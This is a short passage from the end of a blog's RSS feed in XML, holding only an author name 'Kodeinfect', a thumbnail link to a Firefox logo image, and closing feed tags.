(Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://1.bp.blogspot.com/-UApGT8sJ3S4/UcsHmqqvNvI/AAAAAAAAAzU/ye4MoSlg2sw/s72-c/Mozilla_Firefox_Logo_mit_Schriftzug.png" width="72"/></item></channel></rss>